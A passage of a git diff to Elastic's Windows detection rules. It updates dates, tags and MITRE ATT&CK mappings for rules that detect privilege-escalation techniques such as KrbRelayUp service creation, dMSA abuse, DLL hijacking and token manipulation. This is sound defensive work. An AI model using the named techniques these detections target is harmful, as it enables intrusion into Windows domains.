+id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml b/rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml index b68b5bdb6c1..afe20aefbd0 100644 --- a/rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml +++ b/rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/23" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -41,16 +41,7 @@ references = ["https://www.akamai.com/blog/security-research/abusing-dmsa-for-pr risk_score = 73 rule_id = "f0dbff4c-1aa7-4458-9ed5-ada472f64970" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Persistence", "Data Source: Active Directory", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -61,27 +52,21 @@ event.code:5137 and host.os.type:"windows" and winlog.event_data.ObjectClass:"ms [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.002" -name = "Domain Accounts" -reference = "https://attack.mitre.org/techniques/T1078/002/" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" +[[rule.threat.technique.subtechnique]] +id = "T1136.002" +name = "Domain Account" +reference = "https://attack.mitre.org/techniques/T1136/002/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["winlog.event_data.SubjectUserName"] diff --git a/rules/windows/privilege_escalation_dns_serverlevelplugindll.toml b/rules/windows/privilege_escalation_dns_serverlevelplugindll.toml index 45a02549dbd..cb6d429664b 100644 --- a/rules/windows/privilege_escalation_dns_serverlevelplugindll.toml +++ b/rules/windows/privilege_escalation_dns_serverlevelplugindll.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/29" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -59,15 +59,7 @@ references = [ risk_score = 47 rule_id = "5d676480-9655-4507-adc6-4eec311efff8" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -82,14 +74,13 @@ any where host.os.type == "windows" and event.category : ("library", "process") [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/privilege_escalation_driver_newterm_imphash.toml b/rules/windows/privilege_escalation_driver_newterm_imphash.toml index cec1e42a855..8886f6ecb8e 100644 --- a/rules/windows/privilege_escalation_driver_newterm_imphash.toml +++ b/rules/windows/privilege_escalation_driver_newterm_imphash.toml @@ -2,7 +2,7 @@ creation_date = "2022/12/19" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/03" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -116,36 +116,6 @@ event.category:"driver" and host.os.type:windows and event.action:"load" ''' -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" - - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.new_terms] field = "new_terms_fields" value = ["dll.pe.original_file_name", "dll.code_signature.subject_name"] diff --git a/rules/windows/privilege_escalation_expired_driver_loaded.toml b/rules/windows/privilege_escalation_expired_driver_loaded.toml index d96ccf10bfe..0d8afd54d72 100644 --- a/rules/windows/privilege_escalation_expired_driver_loaded.toml +++ b/rules/windows/privilege_escalation_expired_driver_loaded.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/26" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -21,15 +21,7 @@ references = [ risk_score = 47 rule_id = "d12bac54-ab2a-4159-933f-d7bcefa7b61d" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -75,31 +67,28 @@ In Windows environments, drivers facilitate communication between the OS and har [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" reference = "https://attack.mitre.org/techniques/T1036/001/" +[[rule.threat.technique]] +id = "T1553" +name = "Subvert Trust Controls" +reference = "https://attack.mitre.org/techniques/T1553/" +[[rule.threat.technique.subtechnique]] +id = "T1553.002" +name = "Code Signing" +reference = "https://attack.mitre.org/techniques/T1553/002/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/privilege_escalation_exploit_cve_202238028.toml b/rules/windows/privilege_escalation_exploit_cve_202238028.toml index 7ce5473206a..c44702fa2da 100644 --- a/rules/windows/privilege_escalation_exploit_cve_202238028.toml +++ b/rules/windows/privilege_escalation_exploit_cve_202238028.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/23" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -63,20 +63,7 @@ references = [ risk_score = 73 rule_id = "dffbd37c-d4c5-46f8-9181-5afdd9172b4c" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -102,26 +89,13 @@ file where host.os.type == "windows" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/privilege_escalation_gpo_schtask_service_creation.toml b/rules/windows/privilege_escalation_gpo_schtask_service_creation.toml index 83c8fad1aea..b3ba3c4fba9 100644 --- a/rules/windows/privilege_escalation_gpo_schtask_service_creation.toml +++ b/rules/windows/privilege_escalation_gpo_schtask_service_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/13" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -90,36 +90,46 @@ file where host.os.type == "windows" and event.type != "deletion" and event.acti [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" -[[rule.threat.technique.subtechnique]] -id = "T1484.001" -name = "Group Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/001/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + +[[rule.threat.technique.subtechnique]] +id = "T1484.001" +name = "Group Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/001/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_group_policy_iniscript.toml b/rules/windows/privilege_escalation_group_policy_iniscript.toml index 1c705e82d44..c3f9d5e1b2e 100644 --- a/rules/windows/privilege_escalation_group_policy_iniscript.toml +++ b/rules/windows/privilege_escalation_group_policy_iniscript.toml @@ -2,7 +2,7 @@ creation_date = "2021/11/08" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,16 +83,7 @@ Audit Directory Service Changes (Success,Failure) ``` """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Active Directory", - "Resources: Investigation Guide", - "Use Case: Active Directory Monitoring", - "Data Source: Windows Security Event Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs"] timestamp_override = "event.ingested" type = "eql" @@ -121,24 +112,36 @@ any where host.os.type == "windows" and event.code in ("5136", "5145") and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique.subtechnique]] id = "T1484.001" name = "Group Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/001/" - -[[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_group_policy_scheduled_task.toml b/rules/windows/privilege_escalation_group_policy_scheduled_task.toml index 1542e312846..eca2ae97085 100644 --- a/rules/windows/privilege_escalation_group_policy_scheduled_task.toml +++ b/rules/windows/privilege_escalation_group_policy_scheduled_task.toml @@ -2,7 +2,7 @@ creation_date = "2021/11/08" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -85,17 +85,7 @@ Audit Directory Service Changes (Success,Failure) ``` """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Lateral Movement", - "Data Source: Active Directory", - "Resources: Investigation Guide", - "Use Case: Active Directory Monitoring", - "Data Source: Windows Security Event Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs"] timestamp_override = "event.ingested" type = "eql" @@ -121,41 +111,36 @@ any where host.os.type == "windows" and event.code in ("5136", "5145") and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique.subtechnique]] id = "T1484.001" name = "Group Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/001/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1570" -name = "Lateral Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1570/" - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/privilege_escalation_installertakeover.toml b/rules/windows/privilege_escalation_installertakeover.toml index 52bf1177ba3..6cdb156c937 100644 --- a/rules/windows/privilege_escalation_installertakeover.toml +++ b/rules/windows/privilege_escalation_installertakeover.toml @@ -2,7 +2,7 @@ creation_date = "2021/11/25" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/03" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -143,14 +143,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.010" +name = "Services File Permissions Weakness" +reference = "https://attack.mitre.org/techniques/T1574/010/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_krbrelayup_service_creation.toml b/rules/windows/privilege_escalation_krbrelayup_service_creation.toml index 337b065f9c5..9091212979e 100644 --- a/rules/windows/privilege_escalation_krbrelayup_service_creation.toml +++ b/rules/windows/privilege_escalation_krbrelayup_service_creation.toml @@ -2,7 +2,7 @@ creation_date = "2022/04/27" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -58,17 +58,7 @@ references = [ risk_score = 73 rule_id = "e4e31051-ee01-4307-a6ee-b21b186958f4" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Credential Access", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -89,31 +79,31 @@ sequence by winlog.computer_name with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1558" -name = "Steal or Forge Kerberos Tickets" -reference = "https://attack.mitre.org/techniques/T1558/" - - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/privilege_escalation_lsa_auth_package.toml b/rules/windows/privilege_escalation_lsa_auth_package.toml index 24dcc87b0fe..f843c0bda36 100644 --- a/rules/windows/privilege_escalation_lsa_auth_package.toml +++ b/rules/windows/privilege_escalation_lsa_auth_package.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint", "m365_defender"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -19,16 +19,7 @@ name = "Potential LSA Authentication Package Abuse" risk_score = 47 rule_id = "e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Microsoft Defender for Endpoint", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -79,36 +70,36 @@ The Local Security Authority (LSA) in Windows manages authentication and securit [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.002" name = "Authentication Package" reference = "https://attack.mitre.org/techniques/T1547/002/" - - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.002" name = "Authentication Package" reference = "https://attack.mitre.org/techniques/T1547/002/" - - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_make_token_local.toml b/rules/windows/privilege_escalation_make_token_local.toml index 291c41803d3..95ae8823b78 100644 --- a/rules/windows/privilege_escalation_make_token_local.toml +++ b/rules/windows/privilege_escalation_make_token_local.toml @@ -2,7 +2,7 @@ creation_date = "2023/12/04" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -56,14 +56,7 @@ setup = """## Setup Audit event 4624 is needed to trigger this rule. """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -86,10 +79,12 @@ authentication where [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" + [[rule.threat.technique.subtechnique]] id = "T1134.002" name = "Create Process with Token" @@ -100,10 +95,30 @@ id = "T1134.003" name = "Make and Impersonate Token" reference = "https://attack.mitre.org/techniques/T1134/003/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1134" +name = "Access Token Manipulation" +reference = "https://attack.mitre.org/techniques/T1134/" + +[[rule.threat.technique.subtechnique]] +id = "T1134.002" +name = "Create Process with Token" +reference = "https://attack.mitre.org/techniques/T1134/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1134.003" +name = "Make and Impersonate Token" +reference = "https://attack.mitre.org/techniques/T1134/003/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_msi_repair_via_mshelp_link.toml b/rules/windows/privilege_escalation_msi_repair_via_mshelp_link.toml index 8302d80474b..7647f482148 100644 --- a/rules/windows/privilege_escalation_msi_repair_via_mshelp_link.toml +++ b/rules/windows/privilege_escalation_msi_repair_via_mshelp_link.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/12" integration = ["endpoint", "sentinel_one_cloud_funnel", "m365_defender", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -89,31 +89,13 @@ process where event.type == "start" and host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" -[[rule.threat.technique.subtechnique]] -id = "T1218.007" -name = "Msiexec" -reference = "https://attack.mitre.org/techniques/T1218/007/" - - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/privilege_escalation_named_pipe_impersonation.toml b/rules/windows/privilege_escalation_named_pipe_impersonation.toml index 17355c1cbf2..72f5e35f7c6 100644 --- a/rules/windows/privilege_escalation_named_pipe_impersonation.toml +++ b/rules/windows/privilege_escalation_named_pipe_impersonation.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/23" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -135,14 +135,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" +[[rule.threat.technique.subtechnique]] +id = "T1134.001" +name = "Token Impersonation/Theft" +reference = "https://attack.mitre.org/techniques/T1134/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_newcreds_logon_rare_process.toml b/rules/windows/privilege_escalation_newcreds_logon_rare_process.toml index ad3ad46e70b..c686464cf1d 100644 --- a/rules/windows/privilege_escalation_newcreds_logon_rare_process.toml +++ b/rules/windows/privilege_escalation_newcreds_logon_rare_process.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/15" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/06/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -53,14 +53,7 @@ references = ["https://www.elastic.co/pt/blog/how-attackers-abuse-access-token-m risk_score = 47 rule_id = "e468f3f6-7c4c-45bb-846a-053738b3fe5d" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -74,22 +67,39 @@ event.category:"authentication" and host.os.type:"windows" and winlog.logon.type [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" + [[rule.threat.technique.subtechnique]] -id = "T1134.001" -name = "Token Impersonation/Theft" -reference = "https://attack.mitre.org/techniques/T1134/001/" +id = "T1134.002" +name = "Create Process with Token" +reference = "https://attack.mitre.org/techniques/T1134/002/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1134" +name = "Access Token Manipulation" +reference = "https://attack.mitre.org/techniques/T1134/" + +[[rule.threat.technique.subtechnique]] +id = "T1134.002" +name = "Create Process with Token" +reference = "https://attack.mitre.org/techniques/T1134/002/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/windows/privilege_escalation_persistence_phantom_dll.toml b/rules/windows/privilege_escalation_persistence_phantom_dll.toml index 4cc497eaafe..71a2d7cae7a 100644 --- a/rules/windows/privilege_escalation_persistence_phantom_dll.toml +++ b/rules/windows/privilege_escalation_persistence_phantom_dll.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/07" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/01/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -75,17 +75,7 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Sysmon", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon"] timestamp_override = "event.ingested" type = "eql" @@ -151,53 +141,36 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" - - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = 